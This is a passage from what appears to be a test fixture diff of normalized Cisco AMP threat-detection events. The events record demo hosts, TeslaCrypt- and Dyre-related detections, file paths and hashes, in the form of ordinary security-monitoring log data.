Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261638", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "t.exe", + "pid": 2712, + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "@timestamp": 
"2021-01-15T10:17:36.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581769170Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + 
"group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261637", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "file": { + "name": "t.exe", + "path": "\\\\?\\C:\\t.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581771127Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261636", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "explorer.exe", + "pid": 3164, + "hash": { + "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "md5": "8b88ebbb05a0e56b7dcc708498c02b3e" + } + }, + "@timestamp": 
"2021-01-15T10:17:36.000Z", + "file": { + "name": "t.exe", + "path": "\\\\?\\C:\\t.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581773027Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": 
"6159251503560261635", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581774895Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259028591575000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259028591575130", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "explorer.exe", + "pid": 3164, + "hash": { + "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "md5": 
"8b88ebbb05a0e56b7dcc708498c02b3e" + } + }, + "@timestamp": "2021-01-15T10:17:21.000Z", + "file": { + "name": "t.exe", + "path": "\\\\?\\C:\\t.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581776799Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251439135752000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": 
"6159251439135752194", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581778666Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176258981346935000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176258981346934873", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581780563Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176258929807327000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176258929807327320", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581782448Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat 
